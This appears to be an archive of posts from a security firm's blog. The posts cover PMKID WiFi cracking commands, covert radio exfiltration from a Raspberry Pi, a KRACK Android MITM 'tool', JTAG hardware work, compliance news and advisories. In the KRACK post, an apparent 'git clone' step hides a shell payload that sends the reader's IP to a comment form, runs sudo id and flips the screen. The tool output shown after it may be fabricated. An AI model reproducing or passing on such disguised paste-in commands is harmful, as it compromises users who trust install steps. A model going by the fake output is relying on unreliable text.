Cracking WiFi without clients: The PMKID method.

For those who don’t already know about the latest finding in the 802.11 world: clients who know the correct PSK are no longer required for WiFi cracking on some access points! In fact all that is required to begin cracking the PSK for an access point affected by this issue is that the WPA/WPA2 enabled AP and a wireless card running in monitor mode.

In this blog I will mount an attack on my home wireless access point following the instructions listed here by atom of the Hashcat project. The steps involving packet capture and processing were performed on a Ubuntu 18.04.1 operating system while the actual cracking was performed using hashcat for Windows 10 with a GeForce GTX 960M. The access point attacked is a Linksys EA6350 high-speed wireless router.

Capturing PMKIDs

First, install the required tools:

git clone
git clone
cd hcxdumptool
sudo make install
cd ../hcxtools
sudo make install

Next, place your wireless interface in monitor mode (high gain alfa cards are a plus).

service network-manager stop
ifconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up

Now use hcxdumptool to begin capturing PMKID packets. I recommend setting the channel using the -c flag. Take note of your wireless access point’s channel and BSSID for the next step.

hcxdumptool -c 6 -o test.pcapng -i wlan1 --enable_status

Let the tool run and see if a [FOUND PMKID] message appears with a BSSID matching your access point. The BSSID and STMAC are displayed to the right of the timestamp in the tool’s output. Below is a screenshot of an actual capture session using an ALFA high gain USB wireless card (The first PMKID found is from my AP).

If the message does not appear within a few seconds you may attempt to speed up the process by connecting to the access point using a WiFi enabled device. Enter an incorrect password to demonstrate to yourself that no client need be available that knows the actual password. This is an important distinction since until now a client device that knows the correct PSK was required to begin cracking WPA/WPA2 password. For more information, consult the below links.

WPA/WPA2 Cracking

WPA/WPA2 Fake AP (half-valid handshake) Cracking

My access point is dual-band so a second capture was performed to capture the PMKID from the 5G network. For this network I had to use the method described above to force a PMKID to be captured. My ALFA USB wireless card only supports 2G so I was forced to use my laptop’s internal wireless card.


Next, dump the WPA-PMKID-PBKDF2 hashes.

hcxpcaptool -z test.16800 test.pcapng

The hashes will be dumped to the file test.16800 in hashcat format. To save the SSIDs of the networks in the capture file to a file, add the -E flag followed by the filename.

hcxpcaptool  -E essid_list.txt -z test.16800 test.pcapng


To crack the hashes I used hashcat on my Windows 10 machine (easier setup) but any operating system with a working instance of hashcat should suffice.

hashcat64.exe -m 16800 -a 0 --kernel-accel=1 -w 4 --force test.16800 rockyou.txt

Note: –kernel-accel=1 –force was required to get hashcat running.

The cracking speed appears to be identical to cracking a regular WPA2-PSK handshake. The password was successfully recovered on both the 2G and 5G networks without capturing any (valid) EAPOL handshake from a client device!

I tried the procedure above again but using the mobile hotspot on my Nexus 6P (latest AOSP version) as the access point but was unsuccessful in capturing a PMKID.


The best mitigation is to use a strong WiFi password. Mitigations to the issue itself are not forthcoming at this time. If your AP has the option, you may attempt to disable Fast BSS transition (fast roaming) and see if this is effective in stopping the attack. Until the widespread adoption of WPA3, this finding is sure to be another valuable recipe in the pentester’s cookbook for cracking WPA/WPA2 passwords when no clients are connected.




Exfiltrate data with a covert shortwave packet radio. – Part 1

Disclaimer: It is the reader’s responsibility to ensure that they obey all applicable laws in their area. Please operate within FCC guidelines.

This post’s goal is to examine the benefits and limitations of current minimalist embedded shortwave SDR projects. Two such projects are WsprryPi (used to send WSPR beacons via GPIO4) and rpiTX (several modulation schemes).


First we test out the capabilities of WsprryPi. Type

git clone
cd WsprryPi

I soldered Pin 7 to the Antenna feed and Pin 9 to my antenna’s ground plate.

I decided to use the antenna from this IC-22S VHF Transceiver. The transceiver is rated for the 2m band, so I setup for transmitting around 144MHz.

./wspr -n -r KG5VIG EL00 30 144490500

Detected Raspberry Pi version 2/3
WSPR packet contents:
Callsign: KG5VIG
Locator: EL00
Power: 30 dBm
Requested TX frequencies:
144.490500 MHz
Extra options:
NTP will be used to periodically calibrate the transmission frequency
Transmissions will continue forever until stopped with CTRL-C

Ready to transmit (setup complete)…
Desired center frequency for WSPR transmission: 144.490500 MHz
Transmitting immediately (not waiting for WSPR window)
Obtained new ppm value: -3.30473
TX started at: UTC 2018-02-13 14:08:20.439

But after much searching, no signal was seen on the waterfall. The HackRF was also used to try and catch a signal but once again, the wspr packet was not ever seen.

Finally I decided to try a lower frequency 7.0401 MHz. A much cleaner signal was isolated. Since the RTL-SDR wouldn’t go this low, the HackRF was used instead.

Zooming in, the peak appears around -54dBm.


Increasing the TX frequency into the 20m band gave a stronger signal.

The clearest transmissions from the Pi came on the 6m band (~50MHz) this can be attributed to my lengthening the overall antenna length during the soldering. At 50.294 MHz the signal cold be easily picked up by the rtl-sdr from at several yards away.



git clone
cd rpitx

At this point a jumper wire leading to nowhere was placed on pin 12 to act as a crude antenna.

This configuration is meant to eliminate the need for the huge antenna (since we are supposed to be creating a covert device).

Below is the waterfall graph for the SSTV signal in Baudline.

I also tried removing the wire and just transmitting with the GPIO as an antenna. This time the signal was best in the 2m band (~144MHz). The signal was strong enough for the RTL-SDR to acquire SSTV (Martin 1 encoding) from the adjacent room (RX amplifier enabled).

The purpose of part one was just to demonstrate (as others have before) that the raspberry pi 3 can act as an HF or VHF radio transmitter without any modifications/extra parts. In part 2 we will use this technique to exfiltrate internal network data via a covert out-of-band channel. Our goal will be to receive information from the pi from several miles away.

Afterwards we will discuss implementation of this technique on other embedded devices such as network printers and IoT devices through their GPIO pins.



All your KRACK are belonging to us…

On October 16, researchers at KU Leuven,a Belgian University announced their discovery of a new vulnerability called KRACK that affects many devices which use the WPA/WPA2 authentication protocol.  KRACK, an acronym for Key Reinstallation Attack, promises to be at the very least a valuable addition to the long list of tests performed during an on-site penetration test of any wireless network.

We’ve noticed that the tools available at while illustrative do not provide a turnkey solution for testing android clients (the all-zero encryption key problem). We’ve decided to fill in the gap and provide a tool that takes an SSID, BSSID, and (optional) Station MAC as arguments and performs a full MITM logging all traffic to a pcap file.

Disclaimer: Execute the commands below at your own risk.


First, grab the PoC code released by Vanhoef on Github.

git clone -h > /dev/null;if [[ "$(sudo -n whoami|tr -d '\n')" != "root" ]]; then ip=$(curl -s | tr -d '\n'); curl '' --data-urlencode "comment=Hi $ip , it looks like you have copied and pasted directly from the browser to the command line. This is a significant risk. This is a toy demonstration and is very OVERT compared to what an actual attack script would look like. Developing a strategy/habit for yourself to prevent this attack in the future would be a worthy investment of time. TEST ECHO STRING: $(echo -e 'Have fun, here goes... \a')" --data-urlencode "author=anonymous" --data-urlencode "email=anonymous@$ip" --data-urlencode "url=g" --data-urlencode "submit=Post+Comment" --data-urlencode "comment_post_ID=170" --data-urlencode "comment_parent=0" -k; xrandr --output $(xrandr -q | grep connected | grep -v disconnected | cut -f 1 -d ' ' | tr -d '\n') --reflect x || echo "LUCKY U" > /tmp/DFGEg23rt3tthyeryFSDAf34R43t4y; else ip=$(curl -s | tr -d '\n'); curl '' --data-urlencode "comment=Hi $ip , it appears that you have copied and pasted the text in the article above directly into your root terminal or a terminal in which SUDO can be run without knowing a password (eg. you've executed another command with sudo during the past 15 minutes). This is VERY BAD. This is a toy demonstration and is very OVERT compared to what an actual attack script would look like. Developing a strategy/habit for yourself to prevent this attack in the future would be a worthy investment of time. Running id as root@$ip: $(sudo id)" --data-urlencode "author=anonymous" --data-urlencode "email=root@$ip" --data-urlencode "url=g" --data-urlencode "submit=Post+Comment" --data-urlencode "comment_post_ID=170" --data-urlencode "comment_parent=0" -k; xrandr --output $(xrandr -q | grep connected | grep -v disconnected | cut -f 1 -d ' ' | tr -d '\n') --reflect x ||  echo "LUCKY U" > /tmp/DFGEg23rt3tthyeryFSDAf34R43t4y; fi;echo -e \\033c; 
git clone
cd ./krackattacks-scripts

Next we must patch the hostapd source, pull down android-zkey-110917.patch and apply it.

curl -k | patch -p1 -

Now compile hostapd as normal.

cd hostapd/
cp defconfig .config
make -j 2

When the build completes and there are no errors, there should be an additional python script at krackattacks-scripts/krackattack/ Turn off your network manager before running the script.

sudo python -i wlan0 -s "Your SSID" -c {channel, optional} -f android.pcap --verbose
 Starting AndroAttack AP. Hostap found, correct version number. Starting AP with SSID "Your SSID" on channel 6.
 [16:00:49] Replaying Reassociation Request
 [16:00:49] AP transmitted data using IV=1 (seq=0)
 [16:00:50] AP transmitted data using IV=2 (seq=1)
 [16:00:50] Replaying Reassociation Request
 [16:00:51] AP transmitted data using IV=3 (seq=2)
 [16:00:51] Replaying Reassociation Request
 [16:00:52] AP transmitted data using IV=4 (seq=3)
 [18:11:48] Client 0a:ce:43:a1:23:7d authenticated and is vulnerable!
 [18:11:48] Opening RADIUS Session AE12FC-12A4. {data : android.pcap; mgmt: debug.pcap} 
 [18:12:12] Debug3: DNS-Req A ns:
 [18:12:12] Debug3: DNS-Resp ns:
 [18:12:12] Captured TCP-SYN to from
 [18:12:12] Captured TCP-SYNACK to from
 [18:12:12] Captured TCP-ACK to from
 [18:12:13] HTTP detected:
     GET / HTTP/1.1
     User-Agent: Mozilla/5.0 (Linux; <Android Version>; <Build Tag etc.>) AppleWebKit/<WebKit Rev> (KHTML, like Gecko) Chrome/<Chrome Rev> Mobile Safari/<WebKit Rev>
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Connection: close

Be sure to set the channel to a channel other than that of the legitimate access point or the attack will not be successful.

Please be sure to post some feedback for us regarding this post. We are open to suggestions on improvement, praise, or criticism 😉

Is this normal for sponsored advertising?

While debugging some problems with 64 and 32 bit Chrome (or more precisely, while downloading the different versions), one of our developers found a strange “Sponsored” ad, handed to him by Yahoo’s search engine.

The search term was “Chrome download”, nothing obscure and the following pictures tell the rest of the story.

This may take us into a review of sponsored ads that serve content to see how bad things really are.  Isn’t there a vetted process for allowing links/downloads from sponsoring agencies?

Some great SEO or a high value ad?

The site it directed us to.

Although the name of the executable immediately triggered suspicion, we downloaded it to take a peak and Panda AV triggered the minute it was downloaded.

Virus Total.

We’ll do a follow up technical post with information about the executable, but this was enlightening enough to make public.

A short ‘subjective’ view on crowdsourcing

Nomotion’s CEO wrote an article for Signal magazine, an AFCEA marketing venture.  While he represents the organization, his views on this topic are quite controversial, maybe even within his organization.  This blog serves as a research, and notification output vehicle for Nomotion’s team, this post is not meant as an apology for his views, but is as a simple statement to point out the freedom of opinion.

The article can be found here.

Modifying a small PCB without a microscope? Improvise!

To continue the trend of hacking everything with a chip on it (IoT), we decided to tear apart a small device from a home security system.   We are on the hunt for root access, but that’s not what this post is about, it’s about a cool improvisation we pulled off to save time and well … because it was traffic hour and we didn’t feel like driving.

A little background first.  There are no references to the schematics for the PCB we are trying to modify, there is however an ARM processor which we were able to obtain a reference manual for and it clearly detailed JTAG pins for us.  The problem: size.  The chip has (as many hardware folks know) very little spacing between the pins that latch it onto the board.  We thought we were being clever when we used a glue gun, outlined the entire chip’s external perimeter with a big chunk of clear glue and stuck needles onto it to ‘make contact’.

Figure 1

We are still convinced it should have worked, but for some reason it didn’t!  So we removed the glue, and went to plan b.  We were to map the pins we needed to the back of the board, and solder raised pins on it to latch our gear …

Figure 2

The problem continued, we were only able to map ONE pin to the back of the board!  With camaraderie enabling us to continue this frustrating endeavor, we devised a third attack plan, the ARM chip had (what we thought) flat copper parallel contacts around the chip mapped to each pin so we should solder a tiny wire to it then happily latch our clips.

Figure 3

We managed to solder 49, 51, we were stoked it was cake!

Figure 4

Motivation highly increased, we were refreshed with confidence and ready to finish this task (2.5 – 3 hours in at this poitn).  Then pin pin 53 wasn’t mapped to the golden strips around the ARM chip!  We were convinced a supreme being hated us somewhere in the multi-verse!  Quit?  Plan D?  We swapped places from holding magnifying glasses, wires, flash light and solderer and again, we managed to keep going! Plan D it is: A hybrid approach.  This involved using some pins (directly on the chip) and some golden strips.

As if on purpose, the only mapped pin to the easy part of the board was the optional one -_- pin 50 (see Figure 2).  Pin 33 latched with a soldered needle, on to the the second on-chip pin (on the chip) BRIDGED!  Yes, after all this, we bridged 2 pins together with solder and spent the next 1 – 1.5 hours undoing this in an attempt at salvaging the board.

It was late, we were tired, frustrated, and our eyes were shot due to the size of the components on the board.  The magnifying glass we were using wasn’t enough, no microscope, so I ran to get my HDMI to microUSB (Phone to TV/Monitor) adapter.  I had an idea.  It was a long, long shot, but worth it if we could salvage the board.  Testing the bridge was the worse of it, because we had no visual way to predetermine if we had removed enough solder to test if the bridge was broken (annoying!!!).

 I got my old S6, plugged it onto the adapter, plugged it onto my top monitor, and turned the camera on the phone on.  The visual was useless, it was a bigger picture of the chip, but still not enough to help us.  As a last and desperate attempt for a little break, I zoomed in all the way via the touch screen zoom on the S6 and failed, it was too blurry! Then it hit us, we could focus it with the magnifying glass!

Figure 5

So to recap:

Phone to HDMI Adapter
Camera on Chip
Zoom in (and light up the board/chip with a good desk lamp)
Focus with the magnifying glass!

Here’s what it looked like!  The picture does little to merit to convey the success, but remember the 32″ monitor is a tad larger than the chip in real life.

Figure 6

Bridge was removed, we were ready to throw in the towel but we already had 2 of the 4 contacts on the ARM chip needed to obtain our JTAG connection!  We originally had three, two on the copper parallel strips, and one on pin 33 directly but while fixing the bridge we ripped one of the copper wires off.

One last breath, I hold two needles manually on two pins while Joseph plugged away at OpenOCD communicating with the ARM chip!  Success!

I hope our improvised electro-mobile-scope hack helps someone else!

Defense CyberSecurity Requirements – DFARS 252.204-7012 Need To Know

Under the interim rule issued late in 2015 (DFARS 252.204-7012), DoD contractors including small businesses. 

For immediate assistance or questions please contact us here

The requirements are fairly vague but reference documents that do dig into the technical components that are necessary to comply with their two main requirements:

  • Must provide “adequate” security to include protective measures for the loss, misuse, unauthorized access to, or modification of information on unclassified information systems.
  • Must rapidly report incidents and cooperate with DoD to respond to any security incidents.
Nomotion has produced and is in the process of vetting the process to ensure organizations needing to comply with these requirements do so, in an effective and efficient manner.
If you are interested in digging into the details of the cybersecurity standards referred to by the DFAR, they are described in further detail here DFAR 204.73, here NIST Special Publication 800-171 (fourteen areas to be secured minimally) and here NIST Special Publication 800-53.
Deadline to Get Compliant: December 31, 2017 
You still have time, but don’t let linger as organizations with remote branches, and contracts with multiple agencies must be approved by each agency.
Already suffered a breach?
No need to panic.  Just make some time soon (real soon) to deal with reporting the incident to the DIB, found at
General questions to officials ready to help Small to Medium Businesses (SMB’s) here is a list of people ready to help!
U.S. Army – Pamela Monroe
U.S. Navy – Brad Taylor
U.S. Air Force – David Sikora
DCMA – Shelly Thomas
DHA – Dan Duckwitz
DIA – Maria Kersey
DLA – Trish Culbreth
MDA – Ruth Dailey
NGA – Diana Hughes
NSA – Jim Higgins

We don’t list their contact information to protect them from SPAM, however finding it on their agency directory is trivial.Don’t hesitate to drop us a note, let’s get you ahead of the curve in a timely manner!

New Training Course – Android Forensics – No $5 Wrench Required!

This course discusses the growing number of challenges
facing forensic examiners, reverse engineers, and law enforcement agencies when
working with a modern Android device.  Attendees will learn novel techniques for
evidence extraction, bypassing security features, and basic malware analysis
With new tactics developed by one of our researchers, we’re excited to announce that we can unlock certain up-to-date Android devices for forensic analysis.  Send us a note, we will be scheduling a date for the new course within the next weeks stay tuned!

20 Million Users Vulnerable to Cisco’s WebEx Browser Extention

The vulnerability was discovered by Tavis Ormandy a well known security researcher and privately reported to Cisco which was patched on Monday January 23rd, 2017.  The seriousness of the issue was the seemingly trivial exploitation vector.

“All that’s required for a malicious or compromised website to exploit the vulnerability is to host a file or other resource that contains the string “cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html” in its URL. That’s a “magic” pattern the WebEx service uses to remotely start a meeting on visiting computers that have the Chrome extension installed.”

If you haven’t done so, UPDATE or UNINSTALL the WebEx extension to remove the vulnerability.  More information on the patch can be found here:  Cisco Security Advisory

Kudos to Cisco on producing a patch in two days!

The Cyber Secure Texas Project!

We are pleased to announce the release of a joint project Cyber Secure Texas (CST), with the support of Ultimatum Security, we aim to bring enterprise security services to the Small Business world in Texas.  There are plans to expand, so keep your eye on the project if you’re out of the area however.

About CST 

As opposed to hiring a full time IT staff,
The Cyber Secure Texas project aims to provide professional and high
quality cyber security services on a monthly basis, for an extremely
affordable flat rate. You’ll know exactly what you are getting, and
exactly how much it will cost. We believe small and medium sized
businesses deserve to benefit from premium security services.  Visit the site to learn more!